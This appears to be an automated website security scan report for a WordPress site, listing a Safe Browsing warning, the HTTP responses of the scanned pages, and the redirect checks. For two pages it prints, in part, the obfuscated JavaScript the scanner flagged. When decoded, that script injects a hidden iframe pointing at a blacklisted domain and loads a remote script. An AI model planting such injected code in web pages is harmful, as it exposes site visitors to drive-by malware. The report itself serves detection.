Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=silsilanooriyya.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://silsilanooriyya.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 09:03:52 GMT Location: http://www.silsilanooriyya.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.silsilanooriyya.com/xmlrpc.php X-Powered-By: PHP/5.4.29 | clean |
http://www.silsilanooriyya.com/ | 200 OK Content-Length: 44479 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _01O='KkSKpcCfngCdpxGcz5yJlxWe0N3NywXe0lGbpJWazlmd3IDft92Y8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxnMk92afNna4IDfoRHZpdHfuVGZklGaBNDfkFWZoxXZtFmTnFGV5J0c05WZtVGbFRXZnxHewBDOxcjM8JXZyJXZmVmc8hHcwAjM3IDf0h2ZpVGa8VGchN2cl5Wd8VGdpJ3d8xmc1xHZh9Gbu92NywXZtFmcml2Nyw3bm5Wa8Rnbl1Wdj9GZENDfjJ3c0V2Z8t2b8VGd1JWayRHdBRXZzxnZlJHf05WZtV3YvRGOywndpR2NywnZpBjM8RWZkF2bsxHduVmdFh2YhRHdhx3ZhRldpRGMyw3dvRmbpdHOywHZh9Gb3IDfyQ2br91cqlDM8lGchlnclVXcqxnbvlGdj5WdmFEM8V2csFmZwIDfyFmdBB ...[4229 bytes skipped]... Decoded script: ...[14000 bytes skipped]... nload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.width%20%3D%20%27180px%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.height%20%3D%20%27200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var IOI=document.createElement('script');IOI.src='http://jqueryap ...[1737 bytes skipped]... | ||
http://www.silsilanooriyya.com/wp-content/plugins/audio-player/assets/audio-player.js?ver=2.0.4.6 | 200 OK Content-Length: 29366 Content-Type: application/javascript | clean |
http://silsilanooriyya.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Thu, 08 Jan 2015 09:03:54 GMT Pragma: no-cache Location: http://www.silsilanooriyya.com/test404page.js Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.silsilanooriyya.com/xmlrpc.php X-Powered-By: PHP/5.4.29 | clean |
http://www.silsilanooriyya.com/test404page.js | 200 OK Content-Length: 5272 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: shop-corp24.com var IlI='=oQKpkyJ8dCK0lGbwNnLnUGb5R3c3IDf5RXaslmYpNXa2djM812bjxHZJlnQ05WZtVGbFRXZnxHNyAncvNGfyQ2br91cqhjM8hGdkl2d85WZkRWaoF0M8RWYlhGfl1WYOdWYUlnQzRnbl1WZsVEdldGf4BHM4EzNywnclJnclZWZyxHewBDMycjM8RHanlWZoxXZwF2YzVmb1xXZ0lmc3xHbyVHfkF2bs52b3IDfl1WYyZWa3IDfvZmbpxHduVWb1N2bkR0M8NmczRXZnx3avxXZ0VnYpJHd0FEdlNHfmVmc8Rnbl1Wdj9GZ4IDf2lGZ3IDfmlGMywHZlRWYvxGf05WZ2VEajFGd0FGfnFGV2lGZwIDf39GZul2d4IDfkF2bsdjM8JDZvt2XzpWOwwXawFWeyVWdxpGfu9Wa0Nmb1ZWQwwXZzxWYmBjM8JXY2FE ...[4232 bytes skipped]... Decoded script: ...[14000 bytes skipped]... nload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.width%20%3D%20%27180px%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.height%20%3D%20%27200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var IOI=document.createElement('script');IOI.src='http://jqueryap ...[1737 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: silsilanooriyya.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 09:03:52 GMT
Location: http://www.silsilanooriyya.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.silsilanooriyya.com/xmlrpc.php
X-Powered-By: PHP/5.4.29
...0 bytes of data.
GET / HTTP/1.1
Host: silsilanooriyya.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 09:03:52 GMT
Location: http://www.silsilanooriyya.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.silsilanooriyya.com/xmlrpc.php
X-Powered-By: PHP/5.4.29
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: silsilanooriyya.com
Referer: http://www.google.com/search?q=silsilanooriyya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: silsilanooriyya.com
Referer: http://www.google.com/search?q=silsilanooriyya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.